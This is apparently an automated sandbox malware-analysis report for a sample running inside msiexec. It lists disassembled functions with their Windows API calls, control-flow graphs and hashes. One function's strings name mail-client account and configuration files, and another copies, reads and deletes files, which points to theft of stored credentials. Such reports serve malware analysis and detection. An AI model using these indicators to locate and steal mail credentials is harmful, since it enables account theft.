                                                                                          • _free.LIBCMT ref: 209059EA
                                                                                            • Part of subcall function 2090571E: HeapFree.KERNEL32(00000000,00000000,?,2090924F,?,00000000,?,00000000,?,20909276,?,00000007,?,?,20907E5A,?), ref: 20905734
                                                                                            • Part of subcall function 2090571E: GetLastError.KERNEL32(?,?,2090924F,?,00000000,?,00000000,?,20909276,?,00000007,?,?,20907E5A,?,?), ref: 20905746
                                                                                          • _free.LIBCMT ref: 209059F6
                                                                                          • _free.LIBCMT ref: 20905A01
                                                                                          • _free.LIBCMT ref: 20905A0C
                                                                                          • _free.LIBCMT ref: 20905A17
                                                                                          • _free.LIBCMT ref: 20905A22
                                                                                          • _free.LIBCMT ref: 20905A2D
                                                                                          • _free.LIBCMT ref: 20905A38
                                                                                          • _free.LIBCMT ref: 20905A43
                                                                                          • _free.LIBCMT ref: 20905A51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: d02e1c43e72bab573c377fa9753b394da625a1cd1ffb5b72429e0fd60b4f8c0a
                                                                                          • Instruction ID: 07952b067408a75216280ce012db2747287629a0bf93ad0e290c00728171238c
                                                                                          • Opcode Fuzzy Hash: d02e1c43e72bab573c377fa9753b394da625a1cd1ffb5b72429e0fd60b4f8c0a
                                                                                          • Instruction Fuzzy Hash: 9011897A510148FFCB11DF98C842EDE3FAEEF14350B558195BE0A8F125DA31DE50AB84

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 20901D1B
                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 20901D37
                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20901D4B
                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20901D58
                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20901D72
                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20901D7D
                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20901D8A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                          • String ID:
                                                                                          • API String ID: 1454806937-0
                                                                                          • Opcode ID: 18afa54a8ec491326aaee5d2a1a7736e85cba322583799193213db29e6c0a7fc
                                                                                          • Instruction ID: b1c24af764778f41f879d500d2a026354f4b607eae3bb1ca2daacb2942b91ccb
                                                                                          • Opcode Fuzzy Hash: 18afa54a8ec491326aaee5d2a1a7736e85cba322583799193213db29e6c0a7fc
                                                                                          • Instruction Fuzzy Hash: 00214CB194621CBFE7109BA48C8CFEB76BDEF19344F0005A5F506D2140D6799E85AE70

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 304 20909492-209094ef GetConsoleCP 305 20909632-20909644 call 20902ada 304->305 306 209094f5-20909511 304->306 308 20909513-2090952a 306->308 309 2090952c-2090953d call 20907c19 306->309 311 20909566-20909575 call 209079e6 308->311 316 20909563-20909565 309->316 317 2090953f-20909542 309->317 311->305 318 2090957b-2090959b WideCharToMultiByte 311->318 316->311 319 20909548-2090955a call 209079e6 317->319 320 20909609-20909628 317->320 318->305 321 209095a1-209095b7 WriteFile 318->321 319->305 327 20909560-20909561 319->327 320->305 323 209095b9-209095ca 321->323 324 2090962a-20909630 GetLastError 321->324 323->305 326 209095cc-209095d0 323->326 324->305 328 209095d2-209095f0 WriteFile 326->328 329 209095fe-20909601 326->329 327->318 328->324 330 209095f2-209095f6 328->330 329->306 331 20909607 329->331 330->305 332 209095f8-209095fb 330->332 331->305 332->329
                                                                                          APIs
                                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,20909C07,?,00000000,?,00000000,00000000), ref: 209094D4
                                                                                          • __fassign.LIBCMT ref: 2090954F
                                                                                          • __fassign.LIBCMT ref: 2090956A
                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 20909590
                                                                                          • WriteFile.KERNEL32(?,?,00000000,20909C07,00000000,?,?,?,?,?,?,?,?,?,20909C07,?), ref: 209095AF
                                                                                          • WriteFile.KERNEL32(?,?,00000001,20909C07,00000000,?,?,?,?,?,?,?,?,?,20909C07,?), ref: 209095E8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 1324828854-0
                                                                                          • Opcode ID: 13a1bd8b06dcba7cfeabcdd17a60736809a3f8fd1e8dba9adb22f22f3b4438d6
                                                                                          • Instruction ID: 061d706931401a84c9977db0ee3309ee5cd95b878471c2ac9a9cc76ae4bd3cc4
                                                                                          • Opcode Fuzzy Hash: 13a1bd8b06dcba7cfeabcdd17a60736809a3f8fd1e8dba9adb22f22f3b4438d6
                                                                                          • Instruction Fuzzy Hash: 9951BF71E04209AFDB00CFE8CC95AEEBBFAEF19310F10815AE956E7291D6359941DB60

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 333 20903370-209033b5 call 20903330 call 209037a7 338 20903416-20903419 333->338 339 209033b7-209033c9 333->339 340 20903439-20903442 338->340 341 2090341b-20903428 call 20903790 338->341 339->340 342 209033cb 339->342 345 2090342d-20903436 call 20903330 341->345 344 209033d0-209033e7 342->344 346 209033e9-209033f7 call 20903740 344->346 347 209033fd 344->347 345->340 354 209033f9 346->354 355 2090340d-20903414 346->355 350 20903400-20903405 347->350 350->344 353 20903407-20903409 350->353 353->340 356 2090340b 353->356 357 20903443-2090344c 354->357 358 209033fb 354->358 355->345 356->345 359 20903486-20903496 call 20903774 357->359 360 2090344e-20903455 357->360 358->350 365 20903498-209034a7 call 20903790 359->365 366 209034aa-209034c6 call 20903330 call 20903758 359->366 360->359 362 20903457-20903466 call 2090bbe0 360->362 370 20903483 362->370 371 20903468-20903480 362->371 365->366 370->359 371->370
                                                                                          APIs
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 2090339B
                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 209033A3
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 20903431
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 2090345C
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 209034B1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                          • String ID: csm
                                                                                          • API String ID: 1170836740-1018135373
                                                                                          • Opcode ID: 51cb98dd477af35941c49e29782333f6569821ce48c838b440d7743fa6231423
                                                                                          • Instruction ID: 433274db479601fb278ed21b3724491eb28d104ad101e4dcadef2f7d6faac4ae
                                                                                          • Opcode Fuzzy Hash: 51cb98dd477af35941c49e29782333f6569821ce48c838b440d7743fa6231423
                                                                                          • Instruction Fuzzy Hash: 1641A474A082089BCB01CFA8C8C0B9EBBFEAF45224F10C195E9179B261D735DA05DB91

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 20909221: _free.LIBCMT ref: 2090924A
                                                                                          • _free.LIBCMT ref: 209092AB
                                                                                            • Part of subcall function 2090571E: HeapFree.KERNEL32(00000000,00000000,?,2090924F,?,00000000,?,00000000,?,20909276,?,00000007,?,?,20907E5A,?), ref: 20905734
                                                                                            • Part of subcall function 2090571E: GetLastError.KERNEL32(?,?,2090924F,?,00000000,?,00000000,?,20909276,?,00000007,?,?,20907E5A,?,?), ref: 20905746
                                                                                          • _free.LIBCMT ref: 209092B6
                                                                                          • _free.LIBCMT ref: 209092C1
                                                                                          • _free.LIBCMT ref: 20909315
                                                                                          • _free.LIBCMT ref: 20909320
                                                                                          • _free.LIBCMT ref: 2090932B
                                                                                          • _free.LIBCMT ref: 20909336
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                          • Instruction ID: b78cf3f8358dcd80693abeb29a86500563fddf8502c8272d9285daee13b37763
                                                                                          • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                          • Instruction Fuzzy Hash: 3D119031544B08FEDA20ABF4DC47FCB7B9FAF24700F400824BAABB6092DA34B5249751

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 415 20908821-2090883a 416 20908850-20908855 415->416 417 2090883c-2090884c call 20909341 415->417 418 20908862-20908886 MultiByteToWideChar 416->418 419 20908857-2090885f 416->419 417->416 424 2090884e 417->424 422 20908a19-20908a2c call 20902ada 418->422 423 2090888c-20908898 418->423 419->418 425 2090889a-209088ab 423->425 426 209088ec 423->426 424->416 429 209088ca-209088db call 209056d0 425->429 430 209088ad-209088bc call 2090bf20 425->430 428 209088ee-209088f0 426->428 432 209088f6-20908909 MultiByteToWideChar 428->432 433 20908a0e 428->433 429->433 443 209088e1 429->443 430->433 442 209088c2-209088c8 430->442 432->433 436 2090890f-2090892a call 20905f19 432->436 437 20908a10-20908a17 call 20908801 433->437 436->433 447 20908930-20908937 436->447 437->422 446 209088e7-209088ea 442->446 443->446 446->428 448 20908971-2090897d 447->448 449 20908939-2090893e 447->449 451 209089c9 448->451 452 2090897f-20908990 448->452 449->437 450 20908944-20908946 449->450 450->433 453 2090894c-20908966 call 20905f19 450->453 454 209089cb-209089cd 451->454 455 20908992-209089a1 call 2090bf20 452->455 456 209089ab-209089bc call 209056d0 452->456 453->437 470 2090896c 453->470 460 20908a07-20908a0d call 20908801 454->460 461 209089cf-209089e8 call 20905f19 454->461 455->460 467 209089a3-209089a9 455->467 456->460 469 209089be 456->469 460->433 461->460 473 209089ea-209089f1 461->473 472 209089c4-209089c7 467->472 469->472 470->433 472->454 474 209089f3-209089f4 473->474 475 20908a2d-20908a33 473->475 476 209089f5-20908a05 WideCharToMultiByte 474->476 475->476 476->460 477 20908a35-20908a3c call 20908801 476->477 477->437
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,20906FFD,00000000,?,?,?,20908A72,?,?,00000100), ref: 2090887B
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,20908A72,?,?,00000100,5EFC4D8B,?,?), ref: 20908901
                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 209089FB
                                                                                          • __freea.LIBCMT ref: 20908A08
                                                                                            • Part of subcall function 209056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 20905702
                                                                                          • __freea.LIBCMT ref: 20908A11
                                                                                          • __freea.LIBCMT ref: 20908A36
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1414292761-0
                                                                                          • Opcode ID: 303d29b19b1867c7823bfbc839471973a35a992731621bb4cfc1f9c913f05892
                                                                                          • Instruction ID: c05b170a058224dc6dcdb795082dcfbcd8e443c7b747706444884eecaebba015
                                                                                          • Opcode Fuzzy Hash: 303d29b19b1867c7823bfbc839471973a35a992731621bb4cfc1f9c913f05892
                                                                                          • Instruction Fuzzy Hash: FA51F372720206ABDB148FA4CC45FAB37AFEF40750F114669FD5AD6940EB39DC50DAA0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • _strlen.LIBCMT ref: 20901607
                                                                                          • _strcat.LIBCMT ref: 2090161D
                                                                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,2090190E,?,?,00000000,?,00000000), ref: 20901643
                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,2090190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 2090165A
                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,2090190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 20901661
                                                                                          • lstrcatW.KERNEL32(00001008,?,?,?,?,?,2090190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 20901686
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                          • String ID:
                                                                                          • API String ID: 1922816806-0
                                                                                          • Opcode ID: 90e01235bbf4041ffd2480992d851ac2cb38929d17b63efdffebe743f4857e03
                                                                                          • Instruction ID: f42f3a1597f9020019f543407739075d089c25d35205f168cbbd013109e7080a
                                                                                          • Opcode Fuzzy Hash: 90e01235bbf4041ffd2480992d851ac2cb38929d17b63efdffebe743f4857e03
                                                                                          • Instruction Fuzzy Hash: 0921DA36904204BBD704DBD4DC85FEE77FAEF89710F14405AF606AB181DB34A5419BA5

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 20901038
                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 2090104B
                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 20901061
                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 20901075
                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 20901090
                                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 209010B8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrlen$AttributesFilelstrcat
                                                                                          • String ID:
                                                                                          • API String ID: 3594823470-0
                                                                                          • Opcode ID: 4b9be059ee617c30072f09779994449adda253ae5ffb0a57136f803a243211ad
                                                                                          • Instruction ID: bcecbe040eb957455c08de800c66b2ccfb8ade0b3731f888eaa958b12b501d35
                                                                                          • Opcode Fuzzy Hash: 4b9be059ee617c30072f09779994449adda253ae5ffb0a57136f803a243211ad
                                                                                          • Instruction Fuzzy Hash: 63217F359002189BCF109BE4DC48FDF377EEF44214F104296E99A971A1DA359A85DF80

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,20903518,209023F1,20901F17), ref: 20903864
                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 20903872
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2090388B
                                                                                          • SetLastError.KERNEL32(00000000,?,20903518,209023F1,20901F17), ref: 209038DD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                          • String ID:
                                                                                          • API String ID: 3852720340-0
                                                                                          • Opcode ID: dd55948052ba29140e9c49991fdaf94d1c256d06d0a638fe02705c17d4c36758
                                                                                          • Instruction ID: 3126edc41c404a0cfdae25b6577b23067c224f53aa48908c3045eecbfcf590cd
                                                                                          • Opcode Fuzzy Hash: dd55948052ba29140e9c49991fdaf94d1c256d06d0a638fe02705c17d4c36758
                                                                                          • Instruction Fuzzy Hash: 6901B13272DF115EA60416FA6CC5B566BAFDF19678B20C2AAF913950E1EF1A4801B240
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,20906C6C), ref: 20905AFA
                                                                                          • _free.LIBCMT ref: 20905B2D
                                                                                          • _free.LIBCMT ref: 20905B55
                                                                                          • SetLastError.KERNEL32(00000000,?,?,20906C6C), ref: 20905B62
                                                                                          • SetLastError.KERNEL32(00000000,?,?,20906C6C), ref: 20905B6E
                                                                                          • _abort.LIBCMT ref: 20905B74
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                          • String ID:
                                                                                          • API String ID: 3160817290-0
                                                                                          • Opcode ID: 546c7e171c78bb1fb44d44388fcb5bdbc07d45f4ac28fcc40bcd43a1e124d9c1
                                                                                          • Instruction ID: c5f9b7fccc841b61ce364a8e736d8ba9d8a2038f88b7f09cb0887a4907350308
                                                                                          • Opcode Fuzzy Hash: 546c7e171c78bb1fb44d44388fcb5bdbc07d45f4ac28fcc40bcd43a1e124d9c1
                                                                                          • Instruction Fuzzy Hash: 3BF0FF3261C900ABC20223F86C4AF0B3A7F8FE5961F210024F91BE2190FE2D9D42B164
                                                                                          APIs
                                                                                            • Part of subcall function 20901E89: lstrlenW.KERNEL32(?,?,?,?,?,209010DF,?,?,?,00000000), ref: 20901E9A
                                                                                            • Part of subcall function 20901E89: lstrcatW.KERNEL32(?,?,?,209010DF,?,?,?,00000000), ref: 20901EAC
                                                                                            • Part of subcall function 20901E89: lstrlenW.KERNEL32(?,?,209010DF,?,?,?,00000000), ref: 20901EB3
                                                                                            • Part of subcall function 20901E89: lstrlenW.KERNEL32(?,?,209010DF,?,?,?,00000000), ref: 20901EC8
                                                                                            • Part of subcall function 20901E89: lstrcatW.KERNEL32(?,209010DF,?,209010DF,?,?,?,00000000), ref: 20901ED3
                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 2090122A
                                                                                            • Part of subcall function 2090173A: _strlen.LIBCMT ref: 20901855
                                                                                            • Part of subcall function 2090173A: _strlen.LIBCMT ref: 20901869
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                          • API String ID: 4036392271-1520055953
                                                                                          • Opcode ID: c3ed8b8f59975c162cf02f91f8db87f43a8507874967cfa354ed2f992ee51b64
                                                                                          • Instruction ID: 6367834f8a42b984b3223e95caf5047b79943fa6413e4f128bd0327fbdd6daa0
                                                                                          • Opcode Fuzzy Hash: c3ed8b8f59975c162cf02f91f8db87f43a8507874967cfa354ed2f992ee51b64
                                                                                          • Instruction Fuzzy Hash: 8821B679E542187BEB1097E4EC82FED733AEF90718F000556F606EB1D4E6B15E808B59
                                                                                          APIs
                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,20904AEA,?,?,20904A8A,?,20912238,0000000C,20904BBD,00000000,00000000), ref: 20904B59
                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 20904B6C
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,20904AEA,?,?,20904A8A,?,20912238,0000000C,20904BBD,00000000,00000000,00000001,20902082), ref: 20904B8F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          • Opcode ID: 089d99f1ecdf671c5a15cd1e056450c2d0ac3df8a3b7509eabaef32159558f2a
                                                                                          • Instruction ID: b3b339ee8d138bc4ec3dbb6cf6244e4b37025e2932991ffae191e488e12c9d05
                                                                                          • Opcode Fuzzy Hash: 089d99f1ecdf671c5a15cd1e056450c2d0ac3df8a3b7509eabaef32159558f2a
                                                                                          • Instruction Fuzzy Hash: 6DF0A431919508BBDB119F98CC08FADBFBBEF45355F004198F90BA2150DB358D41EA91
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 2090715C
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2090717F
                                                                                            • Part of subcall function 209056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 20905702
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 209071A5
                                                                                          • _free.LIBCMT ref: 209071B8
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 209071C7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                          • String ID:
                                                                                          • API String ID: 336800556-0
                                                                                          • Opcode ID: d28a189b1cd64d45f2b23cee338821dc4e7b76b46c95a9ed4f0f62a487f03189
                                                                                          • Instruction ID: 722bae4bdb46e00ac3ea8f2e2de9cf778c5148d80c75113f40883e90d8e57450
                                                                                          • Opcode Fuzzy Hash: d28a189b1cd64d45f2b23cee338821dc4e7b76b46c95a9ed4f0f62a487f03189
                                                                                          • Instruction Fuzzy Hash: 4501AC72E1E615BF23510AFA5C8CD7BAA7FDEC69707100169FD06C7280DE678C01A1B4
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(00000000,?,00000000,2090636D,20905713,00000000,?,20902249,?,?,20901D66,00000000,?,?,00000000), ref: 20905B7F
                                                                                          • _free.LIBCMT ref: 20905BB4
                                                                                          • _free.LIBCMT ref: 20905BDB
                                                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20905BE8
                                                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20905BF1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000007.00000002.2647167974.0000000020916000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_20900000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free
                                                                                          • String ID:
                                                                                          • API String ID: 3170660625-0
                                                                                          • Opcode ID: 8a4e75d47b98162d137590ae0e83680d41ee6049176796b006ddf090bf5938be
                                                                                          • Instruction ID: 8e6024ca2e5b2ad28a66f7acd5a96335a72d5dc1b5e70379d31d2058020cceb2
                                                                                          • Opcode Fuzzy Hash: 8a4e75d47b98162d137590ae0e83680d41ee6049176796b006ddf090bf5938be
                                                                                          • Instruction Fuzzy Hash: EB01287261DA01BB920227F85C85F2F3A7F9FD55707214064FC1BE2152EE6DED427164
                                                                                          APIs
                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,209010DF,?,?,?,00000000), ref: 20901E9A
                                                                                          • lstrcatW.KERNEL32(?,?,?,209010DF,?,?,?,00000000), ref: 20901EAC
                                                                                          • lstrlenW.KERNEL32(?,?,209010DF,?,?,?,00000000), ref: 20901EB3
                                                                                          • lstrlenW.KERNEL32(?,?,209010DF,?,?,?,00000000), ref: 20901EC8
                                                                                          • lstrcatW.KERNEL32(?,209010DF,?,209010DF,?,?,?,00000000), ref: 20901ED3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2647167974.0000000020901000.00000040.00001000.00020000.00000000.sdmp, Offset: 20900000, based on PE: true
                                                                                          • Associated: 00000007.00000002.2647146965.0000000020900000.00000004.00001000.00020000.00000000.sdmpDownload File
